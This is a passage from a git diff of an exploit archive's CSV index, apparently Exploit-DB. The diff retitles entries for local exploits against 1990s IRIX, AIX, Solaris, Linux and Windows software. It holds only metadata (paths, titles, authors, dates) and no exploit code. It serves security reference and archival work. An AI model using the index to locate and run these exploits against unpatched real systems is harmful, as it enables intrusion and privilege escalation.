Volobuev",irix,local,0 19276,platforms/irix/local/19276.c,"SGI IRIX 6.2 - 'eject' Exploit (1)",1997-05-25,DCRH,irix,local,0 19277,platforms/irix/local/19277.c,"SGI IRIX 6.2 - 'eject' Exploit (2)",1997-05-25,"Last Stage of Delirium",irix,local,0 -19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - abuse.console Exploit",1996-02-02,"David J Meltzer",linux,local,0 -19280,platforms/irix/local/19280.txt,"SGI IRIX 6.2 fsdump - Exploit",1996-12-03,"Jaechul Choe",irix,local,0 -19281,platforms/linux/local/19281.c,"RedHat Linux 5.1 xosview - Exploit",1999-05-28,"Chris Evans",linux,local,0 -19283,platforms/linux/local/19283.c,"Slackware Linux 3.1 - Buffer Overflow",1997-03-04,Solar,linux,local,0 +19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - 'abuse.console' Exploit",1996-02-02,"David J Meltzer",linux,local,0 +19280,platforms/irix/local/19280.txt,"SGI IRIX 6.2 - 'fsdump' Exploit",1996-12-03,"Jaechul Choe",irix,local,0 +19281,platforms/linux/local/19281.c,"RedHat Linux 5.1 - xosview",1999-05-28,"Chris Evans",linux,local,0 +19283,platforms/linux/local/19283.c,"Slackware Linux 3.1 - '/usr/X11/bin/SuperProbe' Buffer Overflow",1997-03-04,Solar,linux,local,0 19284,platforms/linux/local/19284.c,"Armidale Software Yapp Conferencing System 2.2 - Buffer Overflow",1998-01-20,satan,linux,local,0 19285,platforms/linux/local/19285.txt,"Slackware Linux 3.1/3.2 - 'color_xterm' Buffer Overflow (1)",1997-05-27,zgv,linux,local,0 19286,platforms/linux/local/19286.c,"Slackware Linux 3.1/3.2 - 'color_xterm' Buffer Overflow (2)",1997-05-27,"Solar Designer",linux,local,0 -19287,platforms/aix/local/19287.c,"IBM AIX 4.3 infod - Exploit",1998-11-21,"Repent Security Inc",aix,local,0 +19287,platforms/aix/local/19287.c,"IBM AIX 4.3 - 'infod' Exploit",1998-11-21,"Repent Security Inc",aix,local,0 19293,platforms/windows/local/19293.py,"Sysax 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",linux,local,0 -19300,platforms/aix/local/19300.txt,"IBM AIX 4.2.1 snap - Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",aix,local,0 +19300,platforms/aix/local/19300.txt,"IBM AIX 4.2.1 - 'snap' Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",aix,local,0 19302,platforms/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH",1998-01-19,Solar,linux,local,0 -19304,platforms/irix/local/19304.txt,"SGI IRIX 6.4 inpview - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 -19305,platforms/linux/local/19305.c,"RedHat Linux 5.0 msgchk - Exploit",1998-01-19,"Cesar Tascon Alvarez",linux,local,0 -19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation",1997-10-29,"BM ERS Team",aix,local,0 -19307,platforms/aix/local/19307.c,"IBM AIX 4.2 ping - Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 -19309,platforms/aix/local/19309.c,"IBM AIX 4.2 lchangelv - Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 +19304,platforms/irix/local/19304.txt,"SGI IRIX 6.4 - 'inpview' Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 +19305,platforms/linux/local/19305.c,"RedHat Linux 5.0 - 'msgchk' Exploit",1998-01-19,"Cesar Tascon Alvarez",linux,local,0 +19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 - '/usr/bin/portmir' Buffer Overflow / Insecure Temporary File Creation",1997-10-29,"BM ERS Team",aix,local,0 +19307,platforms/aix/local/19307.c,"IBM AIX 4.2 - 'ping' Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 +19309,platforms/aix/local/19309.c,"IBM AIX 4.2 - '/usr/sbin/lchangelv' Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 - login Exploit",1997-05-26,"David Hedley",irix,local,0 -19311,platforms/linux/local/19311.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 mailx - Exploit (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 +19311,platforms/linux/local/19311.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' Exploit (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 19312,platforms/linux/local/19312.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' Exploit (2)",1998-06-25,segv,linux,local,0 -19313,platforms/irix/local/19313.txt,"SGI IRIX 6.4 netprint - Exploit",1997-01-04,"Yuri Volobuev",irix,local,0 +19313,platforms/irix/local/19313.txt,"SGI IRIX 6.4 - 'netprint' Exploit",1997-01-04,"Yuri Volobuev",irix,local,0 19314,platforms/linux/local/19314.c,"RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - 'klogd' Buffer Overflow (1)",1999-02-26,"Michal Zalewski",linux,local,0 19315,platforms/linux/local/19315.c,"RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - 'klogd' Buffer Overflow (2)",1999-02-26,"Esa Etelavuori",linux,local,0 -19317,platforms/irix/local/19317.c,"SGI IRIX 5.3/6.2 ordist - Exploit",1997-05-24,"Yuri Volobuev",irix,local,0 +19317,platforms/irix/local/19317.c,"SGI IRIX 5.3/6.2 - 'ordist' Exploit",1997-05-24,"Yuri Volobuev",irix,local,0 19318,platforms/aix/local/19318.c,"SGI IRIX 6.4 - Permissions Buffer Overflow",1997-05-26,"David Hedley",aix,local,0 -19319,platforms/irix/local/19319.c,"SGI IRIX 5.3 pkgadjust - Exploit",1996-09-23,"Hui-Hui Hu",irix,local,0 +19319,platforms/irix/local/19319.txt,"SGI IRIX 5.3 - 'pkgadjust' Exploit",1996-09-23,"Hui-Hui Hu",irix,local,0 19411,platforms/bsd/local/19411.txt,"BSDI BSD/OS 4.0 /FreeBSD 3.2 /NetBSD 1.4 x86 / OpenBSD 2.5 - UFS Secure Level 1",1999-07-02,Stealth,bsd,local,0 19412,platforms/windows/local/19412.c,"Qbik WinGate 3.0 - Registry",1999-02-22,Chris,windows,local,0 -19326,platforms/solaris/local/19326.txt,"Sun Solaris 7.0 procfs - Exploit",1999-03-09,"Toomas Soome",solaris,local,0 19323,platforms/windows/local/19323.c,"URL Hunter - Buffer Overflow DEP Bypass",2012-06-21,Ayrbyte,windows,local,0 19341,platforms/solaris/local/19341.c,"Solaris 2.5.1 - 'kcms' Buffer Overflow (1)",1998-12-24,"Cheez Whiz",solaris,local,0 19342,platforms/solaris/local/19342.c,"Solaris 2.5.1 - 'kcms' Buffer Overflow (2)",1998-12-24,UNYUN,solaris,local,0 19343,platforms/solaris/local/19343.c,"Solaris 2.5.1 - rsh socket Descriptor",1997-06-19,"Alan Cox",solaris,local,0 -19344,platforms/aix/local/19344.sh,"IBM AIX 3.2.5 - IFS Exploit",1994-04-02,anonymous,aix,local,0 -19345,platforms/aix/local/19345.txt,"IBM AIX 4.2.1 lquerypv - Exploit",1996-11-24,Aleph1,aix,local,0 +19344,platforms/aix/local/19344.sh,"IBM AIX 3.2.5 - 'IFS' Exploit",1994-04-02,anonymous,aix,local,0 +19345,platforms/aix/local/19345.txt,"IBM AIX 4.2.1 - 'lquerypv' File Read",1996-11-24,Aleph1,aix,local,0 19346,platforms/freebsd/local/19346.c,"FreeBSD 3.1 / Solaris 2.6 - Domain Socket",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 -19347,platforms/irix/local/19347.c,"SGI IRIX 6.3 pset - Exploit",1997-07-17,"Last Stage of Delirium",irix,local,0 -19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 rmail - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 +19347,platforms/irix/local/19347.c,"SGI IRIX 6.3 - 'pset' Exploit",1997-07-17,"Last Stage of Delirium",irix,local,0 +19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 - 'rmail' Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 19350,platforms/solaris/local/19350.sh,"Solaris 2.5.1 - License Manager",1998-10-21,"Joel Eriksson",solaris,local,0 -19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 serial_ports - Exploit",1994-02-02,transit,irix,local,0 -19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 suid_exec - Exploit",1996-12-02,"Yuri Volobuev",irix,local,0 -19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 sgihelp - Exploit",1996-12-02,anonymous,aix,local,0 -19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 startmidi - Exploit",1997-02-09,"David Hedley",irix,local,0 +19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 - 'serial_ports' Exploit",1994-02-02,transit,irix,local,0 +19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 - 'suid_exec' Exploit",1996-12-02,"Yuri Volobuev",irix,local,0 +19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2- 'sgihelp' Exploit",1996-12-02,anonymous,aix,local,0 +19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 - 'startmidi' Exploit",1997-02-09,"David Hedley",irix,local,0 19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Exploit",1996-10-30,"Tun-Hui Hu",irix,local,0 -19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 xfsdump - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 +19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 - 'xfsdump' Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",windows,local,0 19360,platforms/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Buffer Overflow",1997-12-21,"Solar Designer",linux,local,0 19362,platforms/sco/local/19362.c,"SCO Open Server 5.0.5 - XBase Buffer Overflow",1999-06-14,doble,sco,local,0 @@ -7471,12 +7473,12 @@ id,file,description,date,author,platform,type,port 19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion()",1999-03-08,"Fabien Royer",windows,local,0 19417,platforms/osx/local/19417.txt,"Apple Mac OS 8 8.6 - Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local,0 -19418,platforms/aix/local/19418.txt,"IBM AIX 4.3.1 adb - Exploit",1999-07-12,"GZ Apple",aix,local,0 +19418,platforms/aix/local/19418.txt,"IBM AIX 4.3.1 - 'adb' Denial of Service",1999-07-12,"GZ Apple",aix,local,0 19419,platforms/linux/local/19419.c,"Linux Kernel 2.0.37 - Segment Limit Privilege Escalation",1999-07-13,Solar,linux,local,0 19422,platforms/linux/local/19422.txt,"BMC Software Patrol 3.2.5 - Patrol SNMP Agent File Creation/Permission",1999-07-14,"Andrew Alness",linux,local,0 19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS Exploit (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0 -19427,platforms/osx/local/19427.txt,"Apple At Ease 5.0 - Exploit",1999-05-13,"Tim Conrad",osx,local,0 -19428,platforms/linux/local/19428.c,"Samba < 2.0.5 - Exploit",1999-07-21,"Gerald Britton",linux,local,0 +19427,platforms/osx/local/19427.txt,"Apple At Ease 5.0 - Information Disclosure",1999-05-13,"Tim Conrad",osx,local,0 +19428,platforms/linux/local/19428.c,"Samba < 2.0.5 - Overflow",1999-07-21,"Gerald Britton",linux,local,0 19429,platforms/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 - ClearCase SUID",1999-05-02,Mudge,linux,local,0 19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage",1999-07-25,"Pawel Wilk",multiple,local,0 19433,platforms/windows/local/19433.rb,"Apple QuickTime - TeXML Stack Buffer Overflow (Metasploit)",2012-06-28,Metasploit,windows,local,0 @@ -7485,7 +7487,7 @@ id,file,description,date,author,platform,type,port 19438,platforms/osx/local/19438.txt,"Ogopogo Autothenticate 1.1.5 - Weak Password Encryption",1999-07-29,"Prozaq of mSec",osx,local,0 19439,platforms/osx/local/19439.txt,"Power On Software On Guard for MacOS 3.2 - Emergency Password",1999-07-29,"Prozaq of mSec",osx,local,0 19440,platforms/windows/local/19440.c,"Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 - Malformed Dialer Entry",1999-07-30,"David Litchfield",windows,local,0 -19447,platforms/multiple/local/19447.c,"NetBSD 1.4 / OpenBSD 2.5 /Solaris 7.0 profil(2) - Exploit",1999-08-09,"Ross Harvey",multiple,local,0 +19447,platforms/multiple/local/19447.c,"NetBSD 1.4 / OpenBSD 2.5 / Solaris 7.0 - 'profil(2)' Modify The Internal Data Space",1999-08-09,"Ross Harvey",multiple,local,0 19460,platforms/multiple/local/19460.sh,"Oracle 8 8.1.5 - Intelligent Agent (1)",1999-08-16,"Brock Tellier",multiple,local,0 19461,platforms/multiple/local/19461.c,"Oracle 8 8.1.5 - Intelligent Agent (2)",1999-08-16,"Gilles PARC",multiple,local,0 19462,platforms/windows/local/19462.c,"Microsoft Windows 95/98 Internet Explorer 5/Telnet - Heap Overflow",1999-08-16,"Jeremy Kothe",windows,local,0 @@ -7511,7 +7513,7 @@ id,file,description,date,author,platform,type,port 19509,platforms/solaris/local/19509.sh,"Solaris 2.6 - Profiling File Creation",1999-09-22,"Steve Mynott",solaris,local,0 19510,platforms/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation",1999-09-17,"Tymm Twillman",linux,local,0 19511,platforms/linux/local/19511.c,"Knox Software Arkeia 4.0 - Backup Local Overflow",1999-09-26,"Brock Tellier",linux,local,0 -19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0 / Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0 +19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0 / Gnome Libs 1.0.8 - 'espeaker' Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS - ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0 19519,platforms/windows/local/19519.rb,"IrfanView JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,local,0 @@ -7520,21 +7522,21 @@ id,file,description,date,author,platform,type,port 19529,platforms/solaris/local/19529.c,"Solaris 7.0 /usr/bin/mail - '-m' Local Buffer Overflow",1999-09-12,"Brock Tellier",solaris,local,0 19533,platforms/solaris/local/19533.c,"Solaris 7.0 - 'ufsdump' Local Buffer Overflow (1)",1998-04-23,smm,solaris,local,0 19534,platforms/solaris/local/19534.c,"Solaris 7.0 - 'ufsdump' Local Buffer Overflow (2)",1998-12-30,"Cheez Whiz",solaris,local,0 -19535,platforms/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp - Exploit",1996-12-01,SOD,hp-ux,local,0 +19535,platforms/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp - Privilege Escalation",1996-12-01,SOD,hp-ux,local,0 19542,platforms/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' Symlink Exploit",1999-10-11,"Brock Tellier",sco,local,0 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 - cancel Buffer Overflow",1999-10-08,"Brock Tellier",sco,local,0 19544,platforms/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local,0 -19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 +19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - '/usr/bin/lpr' Buffer Overrun Privilege Escalation (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Overflow Exploit (1)",1997-04-17,"Pavel Kankovsky",multiple,local,0 19547,platforms/multiple/local/19547.txt,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Overflow Exploit (2)",1997-04-17,"Willy Tarreau",multiple,local,0 19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (2)",1997-02-13,"Solar Designer",multiple,local,0 -19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon Exploit",1996-11-16,"Leshka Zakharoff",multiple,local,0 +19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local,0 19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - cwdtools Exploit",1999-10-22,"Brock Tellier",linux,local,0 19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Backdoor",1999-12-10,"Pauli Ojanpera",windows,local,0 19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging",1999-12-10,"Brock Tellier",sco,local,0 -19676,platforms/freebsd/local/19676.c,"FreeBSD 3.3/Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow (1)",2000-05-17,"Brock Tellier",freebsd,local,0 -19677,platforms/linux/local/19677.c,"FreeBSD 3.3/Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow (2)",2000-05-17,"Larry W. Cashdollar",linux,local,0 +19676,platforms/linux/local/19676.c,"xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Buffer Overflow (1)",2000-05-17,"Brock Tellier",linux,local,0 +19677,platforms/linux/local/19677.c,"xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Buffer Overflow (2)",2000-05-17,"Larry W. Cashdollar",linux,local,0 19582,platforms/unix/local/19582.c,"IRIX 6.5 / Solaris 7.0 / Turbolinux 4.2 - 'uum' Buffer Overflow",1999-11-02,UNYUN,unix,local,0 19583,platforms/unix/local/19583.c,"Turbolinux 3.5 b2 - 'canuum' Buffer Overflow",1999-11-02,UNYUN,unix,local,0 19585,platforms/windows/local/19585.c,"Yamaha MidiPlug 1.1 b-j MidiPlug - Buffer Overflow",1999-11-02,UNYUN,windows,local,0 @@ -7546,7 +7548,7 @@ id,file,description,date,author,platform,type,port 19641,platforms/sco/local/19641.c,"SCO Unixware 7.0/7.0.1/7.1 - Xsco Buffer Overflow",1999-11-25,K2,sco,local,0 19642,platforms/sco/local/19642.c,"SCO Unixware 7.0 - 'xlock(1)' 'Username' Buffer Overflow",1999-11-25,AK,sco,local,0 19643,platforms/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow",1999-10-30,K2,sco,local,0 -19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure - Exploit",1999-11-30,UNYUN,solaris,local,0 +19647,platforms/solaris/local/19647.c,"Solaris 7.0 - 'kcms_configure Exploit",1999-11-30,UNYUN,solaris,local,0 19648,platforms/solaris/local/19648.c,"Solaris 7.0 - CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,solaris,local,0 19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 - 'gdc' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 - 'gdc' Symlink Exploit",1999-12-01,"Brock Tellier",freebsd,local,0 @@ -7566,7 +7568,7 @@ id,file,description,date,author,platform,type,port 19678,platforms/windows/local/19678.c,"VDOLive Player 3.0.2 - Buffer Overflow",1999-12-13,UNYUN,windows,local,0 19683,platforms/windows/local/19683.c,"Ipswitch IMail Server 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 - Weak Password Encryption",1999-12-19,"Mike Davis",windows,local,0 19684,platforms/multiple/local/19684.c,"SCO Open Server 5.0.5 / IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library - Buffer Overflows",1999-12-20,"Last Stage of Delirium",multiple,local,0 -19685,platforms/freebsd/local/19685.txt,"Windowmaker wmmon 1.0 b2 - Exploit",1999-12-22,"Steve Reid",freebsd,local,0 +19685,platforms/freebsd/local/19685.txt,"Windowmaker wmmon 1.0 b2 - Command Execution",1999-12-22,"Steve Reid",freebsd,local,0 19692,platforms/multiple/local/19692.c,"Netscape Communicator 4.5 - prefs.js Buffer Overflow",1999-12-24,"Steve Fewer",multiple,local,0 19693,platforms/linux/local/19693.txt,"Python - Untrusted Search Path/Code Execution",2012-07-09,rogueclown,linux,local,0 19697,platforms/unix/local/19697.c,"IBM Network Station Manager 2.0 R1 - Race Condition",1999-12-27,"Brock Tellier",unix,local,0 @@ -7599,7 +7601,7 @@ id,file,description,date,author,platform,type,port 19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0 19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 - Dosemu Distribution Configuration",2000-03-02,suid,linux,local,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow",2000-03-06,dildog,windows,local,0 -19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer - Exploit",2000-03-05,"Keyser Soze",linux,local,0 +19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer - Privilege Escalation",2000-03-05,"Keyser Soze",linux,local,0 19796,platforms/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr Exploit (2)",2000-03-03,"Babcia Padlina",multiple,local,0 19798,platforms/windows/local/19798.txt,"Microsoft Windows NT 4.0 - User Shell Folders",2000-03-09,anonymous,windows,local,0 19802,platforms/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 - Buffer Overflow (1)",2000-03-11,Krahmer,linux,local,0 @@ -7610,7 +7612,7 @@ id,file,description,date,author,platform,type,port 19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - kreatecd Exploit",2000-03-16,Sebastian,linux,local,0 19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid",2000-03-22,"Egmont Koblinger",linux,local,0 19821,platforms/multiple/local/19821.c,"Citrix Metaframe 1.0/1.8 - Weak Encryption",2000-03-29,"Dug Song",multiple,local,0 -19823,platforms/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 - Exploit",2000-03-24,kadokev,unix,local,0 +19823,platforms/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 - Command Execution",2000-03-24,kadokev,unix,local,0 19836,platforms/windows/local/19836.c,"Symantec pcAnywhere 9.0 - Weak Encryption",2000-04-06,"Pascal Longpre",windows,local,0 19837,platforms/linux/local/19837.c,"Bray Systems Linux Trustees 1.5 - Long Pathname",2000-04-10,"Andrey E. Lerman",linux,local,0 19838,platforms/linux/local/19838.c,"CRYPTOCard CRYPTOAdmin 4.1 - Weak Encryption (1)",2000-04-10,kingpin,linux,local,0 @@ -7648,13 +7650,13 @@ id,file,description,date,author,platform,type,port 19970,platforms/linux/local/19970.c,"KDE 1.1/1.1.1/1.1.2/1.2 - kdesud DISPLAY Environment Variable Overflow",2000-05-27,noir,linux,local,0 19971,platforms/unix/local/19971.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - ELM Buffer Overflow (1)",2000-05-07,Scrippie,unix,local,0 19972,platforms/unix/local/19972.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - ELM Buffer Overflow (2)",2000-05-27,Buffer0verfl0w,unix,local,0 -19979,platforms/linux/local/19979.pl,"KDE 1.1.2 KApplication configfile - Exploit (1)",2000-05-31,kil3r,linux,local,0 -19980,platforms/linux/local/19980.pl,"KDE 1.1.2 KApplication configfile - Exploit (2)",2000-05-31,kil3r,linux,local,0 -19981,platforms/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile - Exploit (3)",2000-05-31,IhaQueR,linux,local,0 +19979,platforms/linux/local/19979.pl,"KDE 1.1.2 KApplication configfile - Privilege Escalation (1)",2000-05-31,kil3r,linux,local,0 +19980,platforms/linux/local/19980.pl,"KDE 1.1.2 KApplication configfile - Privilege Escalation (2)",2000-05-31,kil3r,linux,local,0 +19981,platforms/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile - Privilege Escalation (3)",2000-05-31,IhaQueR,linux,local,0 19989,platforms/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0 19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 - man '/tmp' Symlink Exploit",2000-06-02,"Jason Axley",hp-ux,local,0 19991,platforms/linux/local/19991.c,"BSD 'mailx' 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0 -19992,platforms/linux/local/19992.c,"BSD 'mailx' 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0 +19992,platforms/linux/local/19992.c,"mailx 8.1.1-10 (BSD/Slackware) - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0 19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0 19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0 20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0 @@ -7668,7 +7670,7 @@ id,file,description,date,author,platform,type,port 20018,platforms/solaris/local/20018.txt,"Veritas Software Volume Manager 3.0.2/3.0.3/3.0.4 - File Permission",2000-06-16,"Dixie Flatline",solaris,local,0 20021,platforms/linux/local/20021.txt,"RedHat 6.2 - Piranha Virtual Server Package Plaintext Password",2000-06-09,arkth,linux,local,0 20022,platforms/windows/local/20022.txt,"HM Software S to Infinity 3.0 - Multiple Vulnerabilities",2000-06-15,Synapt1c,windows,local,0 -20024,platforms/linux/local/20024.c,"Mandrake 7.0/7.1 / RedHat Kon2 0.3.9 - fld Input File Overflow",2000-08-01,E-Ligth,linux,local,0 +20024,platforms/linux/local/20024.c,"Mandrake 7.0/7.1 / RedHat Kon2 0.3.9 - '/usr/bin/fld' Input File Overflow",2000-08-01,E-Ligth,linux,local,0 20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow",2012-07-23,mr.pr0n,windows,local,0 20042,platforms/unix/local/20042.c,"Flowerfire Sawmill 5.0.21 - Weak Password Encryption",2000-06-26,"Larry W. Cashdollar",unix,local,0 20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 - libX11 '_XAsyncReply()' Stack Corruption",2000-06-19,"Chris Evans",linux,local,0 @@ -7682,14 +7684,14 @@ id,file,description,date,author,platform,type,port 20107,platforms/unix/local/20107.txt,"CVS Kit CVS Server 1.10.8 - Instructed File Create",2000-07-28,"Tanaka Akira",unix,local,0 20108,platforms/unix/local/20108.txt,"CVS Kit CVS Server 1.10.8 - 'Checkin.prog' 